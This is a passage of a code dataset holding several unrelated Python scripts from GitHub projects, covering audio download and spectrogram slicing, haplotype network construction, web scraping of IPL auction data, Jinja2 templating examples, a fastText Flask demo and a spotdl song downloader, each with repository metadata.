"line_number": 126, "usage_type": "call"}]} +{"seq_id": "9227075194", "text": "import os\nimport sqlite3\nimport urllib.request\nimport os\nfrom multiprocessing.pool import ThreadPool\nimport librosa\nimport matplotlib.pyplot as plt\nimport pickle\nimport pandas as pd\n\nRECORDINGS_DIR = 'storage/recordings/'\nPICKLES_DIR = 'storage/pickles/'\nDATABASE_DIR = 'storage/db.sqlite'\n\ntop_100_csv = pd.read_csv('app/model/top100_img_codes.csv', names=['id1', 'id2', 'species'])\ntop_100_genus_species = top_100_csv.species.tolist()\ntop_100_species = [x.split('_')[1] for x in top_100_genus_species]\n\nconn = sqlite3.connect(DATABASE_DIR)\nc = conn.cursor()\n\nquery = '''SELECT r.id, r.file\n FROM taxonomy AS t\n JOIN recordings AS r ON t.id = r.taxonomy_id\n WHERE t.german = 1.0 AND r.scraped_duration > 100 AND t.species in '''\n\nall_recordings = c.execute(query + str(tuple(top_100_species))).fetchall()\nprint('all recordings: ', len(all_recordings))\nalready_sliced = [int(x.split('_')[0]) for x in os.listdir(PICKLES_DIR)]\nprint('already sliced: ', len(already_sliced))\nrecordings = [x for x in all_recordings if x[0] not in already_sliced]\nprint('recordings: ', len(recordings))\n\nimport sys\nsys.exit()\n\ndef download_and_slice(input_tuple):\n rec_id, download_path = input_tuple\n try:\n file_path = RECORDINGS_DIR + str(rec_id) + \".mp3\"\n resp = urllib.request.urlretrieve(\"http:\" + download_path, file_path)\n assert resp[1]['Content-Type'] == 'audio/mpeg', f'file {rec_id} not available'\n print(f'file {rec_id} downloaded')\n audio, sr = librosa.load(file_path)\n\n audio_abs = [abs(x) for x in audio]\n signal_per_second = [sum(audio_abs[i: i + 22050]) for i in range(0, audio.shape[0], 22050)]\n\n maxdensity, i_start = 0, 0\n for i in range(len(signal_per_second) - 5):\n density = sum(signal_per_second[i:i + 5])\n if density > maxdensity:\n maxdensity 
= density\n i_start = i\n print(i_start)\n\n slice_maxwindow = signal_per_second[i_start: i_start + 5]\n\n slice_signal = audio[i_start * 22050 : (i_start + 5) * 22050]\n \n spect_slice = librosa.feature.melspectrogram(\n slice_signal, sr=22050, n_fft=2048, hop_length=512, n_mels=256, fmin=0, fmax=12000)\n pickle_path = os.path.join(PICKLES_DIR, str(rec_id) + '_0.pkl')\n with open(pickle_path, 'wb+') as f:\n pickle.dump(spect_slice, f)\n os.remove(file_path)\n except urllib.error.HTTPError:\n print(f'file {rec_id} not found, HTTPError')\n pass\n\npool = ThreadPool(4)\npool.map(download_and_slice, recordings)", "repo_name": "multavici/DSR-Bird-Song", "sub_path": "birdsong/data_management/utils/create_extra_slices.py", "file_name": "create_extra_slices.py", "file_ext": "py", "file_size_in_byte": 2569, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 15, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 19, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 29, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 35, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 41, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 41, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 41, "usage_type": "name"}, {"api_name": "librosa.load", "line_number": 44, "usage_type": "call"}, {"api_name": "librosa.feature.melspectrogram", "line_number": 61, "usage_type": "call"}, {"api_name": "librosa.feature", "line_number": 61, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 65, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 66, "usage_type": "call"}, {"api_name": "urllib.request.error", "line_number": 67, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 67, "usage_type": "name"}, {"api_name": "multiprocessing.pool.ThreadPool", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "7219751465", "text": "#!/usr/bin/env python\n# coding=utf-8\n# __author__ = 'Yunchao Ling'\n\n\n# import pandas as pd\n# import numpy as np\nimport os\nimport re\nimport click\nimport time\nimport multiprocessing\nfrom Bio import SeqIO\nfrom tqdm import tqdm, trange\nimport parham\n\n\nvalid_nuc = set([\"A\", \"C\", \"G\", \"T\"])\npos_freq = {}\npos_ref = {}\n\n\ndef hamming(seq1: str, seq2: str, poss_freq: dict):\n seq1 = seq1.upper()\n seq2 = seq2.upper()\n distance = 0\n max_maf = 0\n diff = []\n for i in range(len(seq1)):\n if seq1[i] in valid_nuc and seq2[i] in valid_nuc:\n if seq1[i] != seq2[i]:\n distance += 1\n diff.append(str(i))\n if poss_freq[i] > max_maf:\n max_maf = poss_freq[i]\n else:\n if seq1[i] != seq2[i]:\n diff.append(str(i))\n # if poss_freq[i] > max_maf:\n # max_maf = poss_freq[i]\n # if seq1[i] != seq2[i]:\n # distance += 1\n # diff.append(str(i))\n # if poss_freq[i] > max_maf:\n # max_maf = poss_freq[i]\n if distance == 0:\n for i in range(len(seq1)):\n if seq1[i] != seq2[i]:\n # diff.append(str(i))\n if poss_freq[i] > max_maf:\n max_maf = poss_freq[i]\n # diff.sort(key=lambda x: x[0])\n # diff = [\"%d:%s:%s\" % (item[0], item[1], item[2]) for item in diff]\n # diff = \"|\".join(diff)\n return distance, max_maf, diff\n\n\ndef init_freq(in_file: str):\n global 
pos_freq\n global pos_ref\n\n count = 0\n with open(in_file, \"r\") as infile:\n infile.readline()\n for line in infile:\n splitline = line.rstrip().split(\"\\t\")\n pos_ref[count] = int(splitline[0])\n pos_freq[count] = float(splitline[2])\n count += 1\n\n\ndef find_clade(clades: dict, node: int):\n for key in clades:\n if node in clades[key]:\n return key\n\n\ndef seq2geno(seq: str, seqindex: list):\n geno_list = []\n for item in seqindex:\n geno_list.append(\"%d:%s\" % (item[1], seq[item[0]]))\n genos = \"|\".join(geno_list)\n return genos\n\n\ndef exec_queue(iter: int, seqss: list, poss_freq: dict, out_file: str):\n outfile = open(out_file, \"a+\")\n myid = int(multiprocessing.current_process().name.split(\"-\")[1])\n # for i in tqdm(range(len(seqss)), desc=str(iter)):\n for i in range(len(seqss)):\n if iter < i:\n distance, max_maf, diff = hamming(seqss[iter], seqss[i], poss_freq)\n outfile.write(\"%d\\t%d\\t%d\\t%f\\t%s\\n\" % (iter, i, distance, max_maf, \",\".join(diff)))\n outfile.flush()\n outfile.close()\n\n\n@click.command()\n@click.argument(\"in_dir\", type=click.Path(exists=True))\ndef batch_haplotype_network(in_dir: str):\n '''\n 批量生成单倍型,并且按照all生成单倍型网络\n 输入目录包括pi_pos FASTA文件,freq文件\n 输出在同一目录,包括node文件,和net文件\n 对所有频率阈值生成node文件,仅对无过滤的all生成net文件\n '''\n '''\n Generate haplotypes in batches, and generate haplotypes according to all. \n The network input directory includes pi_pos FASTA files, \n and the freq files are output in the same directory, including node files, and net files. \n Generate node files for all frequency thresholds, only for all without filtering net file \n '''\n for infile in os.listdir(in_dir):\n if infile.startswith(\"pi_pos\"):\n # print(\"正在计算文件%s\" % infile)\n print(\"Calculating file %s\" % infile)\n pi_pos_file = os.path.join(in_dir, infile)\n freq_file = re.sub(r'pi_pos_(.*?).fasta', r'freq_\\1.txt', pi_pos_file)\n if infile.find(\"all\") != -1:\n haplotype_network(pi_pos_file, freq_file, True)\n else:\n haplotype_network(pi_pos_file, freq_file, False)\n\n\ndef haplotype_network(pi_pos_file: str, freq_file: str, draw_net: bool):\n # print(\"生成pattern列表\")\n print(\"Generate a list of patterns\")\n seqs = {}\n seq_count = 0\n seqrecords = SeqIO.parse(pi_pos_file, \"fasta\")\n print(pi_pos_file)\n for seqrecord in seqrecords:\n seq_count += 1\n # seqs.add(str(seqrecord.seq).upper())\n seq = str(seqrecord.seq).upper()\n if seq in seqs:\n seqs[seq].append(str(seq_count))\n else:\n seqs[seq] = [str(seq_count)]\n\n init_freq(freq_file)\n\n # print(\"生成nodes文件\")\n print(\"Generate nodes file\")\n seqss = list(seqs)\n seqindex = []\n for i in range(len(seqss[0])):\n seqindex.append([i, pos_ref[i], pos_freq[i]])\n seqindex.sort(key=lambda x: (-x[2], x[1]))\n nodes_file = open(re.sub(r'pi_pos_(.*?).fasta', r'nodes_\\1.txt', pi_pos_file), \"w\")\n genos = {}\n for seq in seqss:\n genos[seq] = seq2geno(seq, seqindex)\n nodes_file.write(genos[seq] + \"\\t\" + \"\\t\".join(seqs[seq]) + \"\\n\")\n nodes_file.flush()\n nodes_file.close()\n\n if draw_net:\n # print(\"计算海明距离矩阵\")\n print(\"Calculate the Hamming distance matrix\")\n print('len seqss is {} x {}'.format(len(seqss), len(seqss[0])))\n # df_distance = pd.DataFrame(np.zeros([len(seqss), len(seqss)], dtype=int), index=seqss, columns=seqss)\n # df_max_maf = pd.DataFrame(np.zeros([len(seqss), len(seqss)], dtype=float), index=seqss, columns=seqss)\n # df_diff = pd.DataFrame(np.empty([len(seqss), len(seqss)], dtype=str), index=seqss, columns=seqss)\n # for i in tqdm(range(len(seqss)), desc=\"line\"):\n # for j in 
range(len(seqss)):\n # if i > j:\n # df_distance.iloc[i, j], df_max_maf.iloc[i, j], df_diff.iloc[i, j] = hamming(seqss[i], seqss[j])\n tempfile = os.path.join(os.path.dirname(pi_pos_file), \"candidate_links.txt\")\n if os.path.exists(tempfile):\n os.remove(tempfile)\n t_beg = time.time()\n parham_mode = os.environ.get('PARHAM_MODE', 'FULL')\n if parham_mode != 'OFF':\n out_file = tempfile\n net_file = re.sub(r'pi_pos_(.*?).fasta', r'net_\\1.txt', pi_pos_file)\n if parham_mode == 'N2_LOOP_ONLY':\n net_file = None\n elif parham_mode != 'FULL_WITH_CAND':\n out_file = None\n parham.compute_hamming_matrix(seqss, pos_freq, pos_ref,\n out_file, net_file)\n if parham_mode.startswith('FULL'):\n return\n else:\n print('Not using parham. You might be super slow!')\n # Original implementation\n p = multiprocessing.Pool(8, initializer=tqdm.set_lock,\n initargs=(multiprocessing.RLock(),))\n # p = multiprocessing.Pool(multiprocessing.cpu_count())\n for i in range(len(seqss)):\n p.apply(exec_queue, args=(i, seqss, pos_freq, tempfile))\n p.close()\n p.join()\n t_end = time.time()\n print('Elapsed time {} s'.format(t_end - t_beg))\n\n # print(\"生成候选link列表\")\n print(\"Generate a list of candidate links\")\n node_list = []\n # for i in tqdm(range(len(df_distance.index)), desc=\"line\"):\n # for j in range(len(df_distance.columns)):\n # if i > j:\n # # if df_distance.iloc[i, j] > 0:\n # node_list.append([i + 1, j + 1, df_distance.iloc[i, j], df_max_maf.iloc[i, j], df_diff.iloc[i, j]])\n with open(tempfile, \"r\") as candi_file:\n for line in tqdm(candi_file, desc=\"link\"):\n line = line.rstrip()\n splitline = line.split(\"\\t\")\n node_list.append([int(splitline[0]) + 1, int(splitline[1]) + 1, int(splitline[2]), float(splitline[3]),\n splitline[4]])\n\n # print(\"候选link排序\")\n print(\"Candidate link ranking\")\n node_list.sort(key=lambda x: (x[2], x[3]))\n\n # print(\"生成网络\")\n print(\"Generate network\")\n net_list = []\n max_length = len(seqss)\n added_nodes = set()\n clades = {}\n current_clade = 0\n\n for node in tqdm(node_list, desc=\"link\"):\n if len(added_nodes) != max_length:\n if node[0] not in added_nodes:\n if node[1] not in added_nodes:\n clades[current_clade] = set([node[0], node[1]])\n current_clade += 1\n else:\n clades[find_clade(clades, node[1])].add(node[0])\n net_list.append(node)\n else:\n if node[1] not in added_nodes:\n clades[find_clade(clades, node[0])].add(node[1])\n net_list.append(node)\n else:\n clade0 = find_clade(clades, node[0])\n clade1 = find_clade(clades, node[1])\n if clade0 != clade1:\n clades[clade0] = clades[clade0].union(clades[clade1])\n clades.pop(clade1)\n net_list.append(node)\n added_nodes.add(node[0])\n added_nodes.add(node[1])\n else:\n clade0 = find_clade(clades, node[0])\n clade1 = find_clade(clades, node[1])\n if clade0 != clade1:\n clades[clade0] = clades[clade0].union(clades[clade1])\n clades.pop(clade1)\n net_list.append(node)\n if len(clades) < 2:\n break\n\n net_file = open(re.sub(r'pi_pos_(.*?).fasta', r'net_\\1.txt', pi_pos_file), \"w\")\n for link in net_list:\n # net_file.write(\"%d\\t%d\\t%d\\t%s\\n\" % (link[0], link[1], link[2], link[4]))\n diff = []\n for i in link[4].split(\",\"):\n i = int(i)\n diff.append([pos_ref[i], seqss[link[0] - 1][i], seqss[link[1] - 1][i]])\n diff.sort(key=lambda x: x[0])\n diff = [\"%d:%s:%s\" % (item[0], item[1], item[2]) for item in diff]\n diff = \"|\".join(diff)\n net_file.write(\"%d\\t%d\\t%d\\t%s\\n\" % (link[0], link[1], link[2], diff))\n net_file.flush()\n net_file.close()\n\n\nif __name__ == '__main__':\n 
batch_haplotype_network()\n", "repo_name": "BioMedBigDataCenter/VENAS", "sub_path": "haplotype_network.py", "file_name": "haplotype_network.py", "file_ext": "py", "file_size_in_byte": 10403, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "52", "api": [{"api_name": "multiprocessing.current_process", "line_number": 88, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path", "line_number": 117, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 118, "usage_type": "call"}, {"api_name": "click.command", "line_number": 98, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 99, "usage_type": "call"}, {"api_name": "click.Path", "line_number": 99, "usage_type": "call"}, {"api_name": "Bio.SeqIO.parse", "line_number": 130, "usage_type": "call"}, {"api_name": "Bio.SeqIO", "line_number": 130, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 150, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 169, "usage_type": "call"}, {"api_name": "os.path", "line_number": 169, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 169, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 170, "usage_type": "call"}, {"api_name": "os.path", "line_number": 170, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 171, "usage_type": "call"}, {"api_name": "time.time", "line_number": 172, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 173, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 173, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 176, "usage_type": "call"}, {"api_name": "parham.compute_hamming_matrix", "line_number": 181, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 188, "usage_type": "call"}, {"api_name": "tqdm.tqdm.set_lock", "line_number": 188, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 188, "usage_type": "name"}, {"api_name": "multiprocessing.RLock", "line_number": 189, "usage_type": "call"}, {"api_name": "time.time", "line_number": 195, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 207, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 225, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 257, "usage_type": "call"}]} +{"seq_id": "72999872806", "text": "from rest_framework import serializers\nfrom .models import Note\n\n\nclass NoteSerializer(serializers.HyperlinkedModelSerializer):\n user = serializers.HiddenField(default=serializers.CurrentUserDefault())\n url = serializers.HyperlinkedIdentityField(view_name=\"notes:note-detail\")\n\n class Meta:\n model = Note\n fields = ['title', 'text', 'created', 'url', 'user']\n", "repo_name": "YaroslavChyhryn/PythonPLINK", "sub_path": "notes/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 382, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.serializers.HyperlinkedModelSerializer", "line_number": 5, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 5, "usage_type": "name"}, {"api_name": "rest_framework.serializers.HiddenField", "line_number": 6, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 6, "usage_type": 
"name"}, {"api_name": "rest_framework.serializers.CurrentUserDefault", "line_number": 6, "usage_type": "call"}, {"api_name": "rest_framework.serializers.HyperlinkedIdentityField", "line_number": 7, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 7, "usage_type": "name"}, {"api_name": "models.Note", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "73101525284", "text": "\"\"\"Feito para salvar as despesas por ano a partir do ano de 2008 em um csv\"\"\"\nimport urllib.request\nfrom datetime import datetime\n\nstart_year = 2008\ncurrent_date = datetime.today()\n\nraw_url = 'http://riotransparente.rio.rj.gov.br/arquivos/Open_Data_Desp_{year}.asp'\nraw_filename = '{extract_date}_{reference_year}.csv'\n\nfor year in range(start_year, current_date.year + 1): # include current year in loop\n url = raw_url.format(year=year)\n filename = raw_filename.format(extract_date=current_date.strftime('%Y%m%d'), reference_year=year)\n urllib.request.urlretrieve(url, filename)", "repo_name": "jamesperes-zz/rio-transparente", "sub_path": "salva.py", "file_name": "salva.py", "file_ext": "py", "file_size_in_byte": 588, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "datetime.datetime.today", "line_number": 6, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 6, "usage_type": "name"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 14, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 14, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 14, "usage_type": "name"}]} +{"seq_id": "11831756554", "text": "from torch_geometric.data import download_url, extract_zip\n\nurl = 'https://files.grouplens.org/datasets/movielens/ml-latest-small.zip'\nextract_zip(download_url(url, '.'), '.')\n\nmovie_path = './ml-latest-small/movies.csv'\nrating_path = './ml-latest-small/ratings.csv'\n\n\nimport pandas as pd\n\nprint(pd.read_csv(movie_path).head())\nprint(pd.read_csv(rating_path).head())", "repo_name": "nayong-kim/dev_gnn", "sub_path": "geometric_dataset.py", "file_name": "geometric_dataset.py", "file_ext": "py", "file_size_in_byte": 366, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch_geometric.data.extract_zip", "line_number": 4, "usage_type": "call"}, {"api_name": "torch_geometric.data.download_url", "line_number": 4, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 12, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "18799445492", "text": "from jinja2 import Template\n\ncars = [\n {'model': 'Audi', 'price': 23000},\n {'model': 'Skoda', 'price': 17300},\n {'model': 'Volvo', 'price': 44300},\n {'model': 'Volkswagen', 'price': 21300},\n]\n\ntpl = \"Суммарная цена автомобилей {{ cs | sum(attribute='price') }}\"\ntm = Template(tpl)\nmsg = tm.render(cs=cars)\nprint(msg)\n\ndigits = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\ntpl = \"Суммарная цена автомобилей {{ cs | sum }}\"\ntm = Template(tpl)\nmsg = tm.render(cs=digits)\nprint(msg)\n\ntpl = \"Максимальная цена автомобиля {{cs | max(attribute='price')}}\"\ntm = Template(tpl)\nmsg = tm.render(cs=cars)\nprint(msg)\n\npersons = [\n {'name': 'Name1', 'old': 18, 'weight': 78.5},\n {'name': 'Name2', 'old': 28, 'weight': 82.3},\n {'name': 'Name3', 'old': 38, 'weight': 64.1},\n {'name': 'Name4', 'old': 48, 'weight': 
77.6},\n]\n\ntpl = '''\n{%- for u in users -%}\n{% filter upper %} {{u.name}} {% endfilter %}\n{% endfor -%}\n'''\n\ntm = Template(tpl)\nmsg = tm.render(users=persons)\nprint(msg)\n\nhtml = '''\n{%- macro input(name, value='', type='text', size=20) -%}\n    <input type=\"{{ type }}\" name=\"{{ name }}\" value=\"{{ value }}\" size=\"{{ size }}\">\n{%- endmacro %}\n\n<p>{{ input('username')}}\n<p>{{ input('email')}}\n<p>{{ input('password')}}\n'''\n\ntm = Template(html)\nmsg = tm.render()\nprint(msg)\n\n\nhtml = '''\n{% macro list_users(list_of_users) -%}\n<ul>\n{% for u in list_of_users -%}\n    <li>{{u.name}} {{caller(u)}}\n{%- endfor %}\n</ul>\n{%- endmacro %}\n\n{% call(user) list_users(users) %}\n    <ul>\n    <li>age: {{user.old}}\n    <li>weight: {{user.weight}}\n    </ul>\n{% endcall -%}\n'''\n\ntm = Template(html)\nmsg = tm.render(users=persons)\nprint(msg)\n", "repo_name": "MuzaffarSoliyev/jinja2-tutorials", "sub_path": "ex3.py", "file_name": "ex3.py", "file_ext": "py", "file_size_in_byte": 1731, "program_lang": "python", "lang": "te", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "jinja2.Template", "line_number": 11, "usage_type": "call"}, {"api_name": "jinja2.Template", "line_number": 18, "usage_type": "call"}, {"api_name": "jinja2.Template", "line_number": 23, "usage_type": "call"}, {"api_name": "jinja2.Template", "line_number": 40, "usage_type": "call"}, {"api_name": "jinja2.Template", "line_number": 54, "usage_type": "call"}, {"api_name": "jinja2.Template", "line_number": 76, "usage_type": "call"}]}
+{"seq_id": "73971493924", "text": "# To run the thing do:\n# \n# 1) Make sure you have flask and everything else installed (pip install blah)\n# 2) replace with your model path and run: \n#\n# FLASK_APP=techdemo.py FLASK_DEBUG=1 MODEL_PATH=\"/Users/eugene/Git/fastText/models/wiki.da.bin\" python -m flask run\n# \n\nimport fasttext\nimport json\nimport pandas\nimport numpy as np\nimport scipy\nimport string # for punctuation\nimport os # to access environment variables\n\nfrom scipy import spatial\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom scipy.spatial.distance import cosine as cosine_distance\nfrom collections import OrderedDict\nimport matplotlib.pyplot as plt\n\nfrom flask import Flask, request, send_from_directory, render_template\n\nif not 'model' in vars():\n\tpath = os.environ['MODEL_PATH']\n\tmodel = fasttext.load_model(path)\n\ndef read_ffms():\n\twith open('../FFM.json') as data_file: \n\t\tdata = json.load(data_file)[\"Historie\"][\"3. - 4. 
klasse\"]\n\t\tfaerdiheder = data[\"færdighed\"]\n\t\tviden = data[\"viden\"]\n\n\t\treturn {\"faerdiheder\": faerdiheder, \"viden\": viden}\n\n#####################################\n# dirty web development stuff below #\n#####################################\napp = Flask(__name__, static_url_path='')\n\n@app.route('/suggest', methods=[\"POST\"])\ndef suggest(text = None):\n\tffms = read_ffms()\n\tt = request.form['text']\n\tif not t:\n\t\treturn render_template('cards.html', text=None)\n\n\ttext_score = model[t]\n\tdistances = {}\n\tfor (i, text) in enumerate(ffms[\"faerdiheder\"]):\n\t\tffm_score = model[text]\n\t\tdistance = cosine_distance(text_score, ffm_score)\n\t\tdistances[float(distance)] = i\n\t\n\tdistances = OrderedDict(sorted(distances.items(), key=lambda item: item[0]))\n\trendered = []\n\tfor i in distances:\n\t\tindex = distances[i]\n\t\tdata = { \n\t\t\t\"first\": (i == list(distances.keys())[0]),\n\t\t\t\"score\": \"{0:.1f}%\".format((1-i)*100), \n\t\t\t\"faerdighed\": ffms[\"faerdiheder\"][index], \n\t\t\t\"viden\": ffms[\"viden\"][index] \n\t\t}\n\t\trendered.append(render_template('card.html', data=data))\n\n\treturn render_template('cards.html', text=(' '.join(rendered[0:5])))\n\n@app.route('/static/')\ndef send_static(path):\n return send_from_directory('static', path)\n\n@app.route('/')\n@app.route('/')\ndef main(portal_name = None):\n\treturn render_template('main.html', portal_name=portal_name)\n", "repo_name": "eugene/gyldendal", "sub_path": "techdemo/techdemo.py", "file_name": "techdemo.py", "file_ext": "py", "file_size_in_byte": 2269, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.environ", "line_number": 26, "usage_type": "attribute"}, {"api_name": "fasttext.load_model", "line_number": 27, "usage_type": "call"}, {"api_name": "json.load", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 45, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 45, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 47, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cosine", "line_number": 53, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 56, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 68, "usage_type": "call"}, {"api_name": "flask.send_from_directory", "line_number": 72, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "73971493924", "text": "# Importing Libraries\nimport pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\n\n\n# Website URL\nurl = 'https://www.iplt20.com/auction'\nr = requests.get(url)\n\n\n# Extracting HTML\nsoup = BeautifulSoup(r.content, 'html.parser')\n\n\n# Classes\nsection_class = 'ih-points-table-sec position-relative'\nteam_name_class = 'ih-t-left align-center'\ntable_class = 'ih-td-tab auction-tbl'\n\n\n# Finding sections wih table\nmain_section = soup.find_all('section', class_ = section_class)\n# DataFrame Header\nheader = ['TEAM']\ncreate_df = True\n\n\nfor section in main_section:\n # getting table name\n team_name = (section.find('h2')).text\n # Getting Table\n table = section.find('table', class_ = table_class)\n # Creating DataFrame and setting headers\n if create_df == 
True:\n headings = table.find_all('th')\n for head in headings:\n header.append(head.text)\n df = pd.DataFrame(columns = header)\n create_df = False\n # Getting data from table\n rows = table.find_all('tr')\n for row in rows[1:]:\n # Creating a row of data ['Team Name', 'Player Name', 'Nationality', 'Type', 'Price']\n row_data = [team_name]\n data = row.find_all('td')\n for td in data:\n row_data.append(td.text)\n # Adding row to DataFrame\n df.loc[len(df)] = row_data\n \n# Saving to csv\ndf.to_csv('ipl_data.csv', index = False)", "repo_name": "nik-hil-24/IPL-Auction", "sub_path": "scraping.py", "file_name": "scraping.py", "file_ext": "py", "file_size_in_byte": 1397, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 9, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "34231093259", "text": "import spotdl\nimport clipboard\nimport enchant\nfrom shutil import copyfile\nfrom os import listdir, remove, mkdir\nfrom os.path import isfile, join\nfrom pathlib import Path, PurePath\nimport ctypes\n\npath = Path(Path.home(), \"Desktop/Music\")\n\n\ndef download(url: str):\n try:\n ans = ctypes.windll.user32.MessageBoxW(0, f\"Start downloading this URL?\\n\\n{url}\", \"Success\", 1)\n if ans == 1:\n dict = enchant.Dict(\"en_US\")\n words = url.split(' ', 1)\n if not dict.check(words[0]) and not (url.startswith(\"https://open.spotify.com\") or url.startswith(\"https://youtu.be\")):\n raise Exception(\"Bad URL!\")\n downloader = spotdl.Spotdl()\n downloader.download_track(url)\n default_files = [\"main.py\", \"setup.cmd\", \"song-download.cmd\", \".gitignore\"]\n song_files = [f for f in listdir(\"./\") if isfile(join(\"./\", f)) and f not in default_files]\n if not path.exists():\n path.mkdir()\n copyfile(f\"./{song_files[0]}\", Path(path, song_files[0]))\n remove(song_files[0])\n ctypes.windll.user32.MessageBoxW(0, f\"Done downloading {song_files[0]}\", \"Success\", 0)\n except Exception as e:\n ctypes.windll.user32.MessageBoxW(0, str(e), \"Fail\", 0)\n\n\nif __name__ == '__main__':\n download(clipboard.paste())\n", "repo_name": "SharonFabin/spotify-downloader", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1346, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pathlib.Path", "line_number": 10, "usage_type": "call"}, {"api_name": "pathlib.Path.home", "line_number": 10, "usage_type": "call"}, {"api_name": "ctypes.windll.user32.MessageBoxW", "line_number": 15, "usage_type": "call"}, {"api_name": "ctypes.windll", "line_number": 15, "usage_type": "attribute"}, {"api_name": "enchant.Dict", "line_number": 17, "usage_type": "call"}, {"api_name": "spotdl.Spotdl", "line_number": 21, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 27, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 27, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 28, "usage_type": "call"}, {"api_name": "ctypes.windll.user32.MessageBoxW", "line_number": 29, "usage_type": "call"}, {"api_name": "ctypes.windll", 
"line_number": 29, "usage_type": "attribute"}, {"api_name": "ctypes.windll.user32.MessageBoxW", "line_number": 31, "usage_type": "call"}, {"api_name": "ctypes.windll", "line_number": 31, "usage_type": "attribute"}, {"api_name": "clipboard.paste", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "38102073109", "text": "import sys\nsys.path.append('./src')\nsys.path.append('./src/models')\nimport torch.nn as nn\nimport numpy as np\nimport dataman.wrangle as wrangle\nfrom models.seq2seq_model_pytorch import Seq2Seq\nimport models.model_pipeline_pytorch as model_pipeline_pytorch\nimport models.siamese_pytorch as siamese_pytorch\nfrom utils import dotdict\nimport torch\nimport torch.optim as optim\nimport sys\nimport logging\n\nimport models.load_embeddings as load_embeddings\nimport constants\n\nlogger = logging.getLogger(__name__)\n\nargs = dotdict({\n 'type': 'siamese',\n 'encoder_type': 'rnn',\n 'lr': 0.05,\n 'use_dot_attention': True,\n 'learning_rate_decay': 0.98,\n 'max_length': 70,\n 'epochs': 10,\n 'batch_size': 64,\n 'batches_per_epoch': 3000,\n 'test_batches_per_epoch': 500,\n 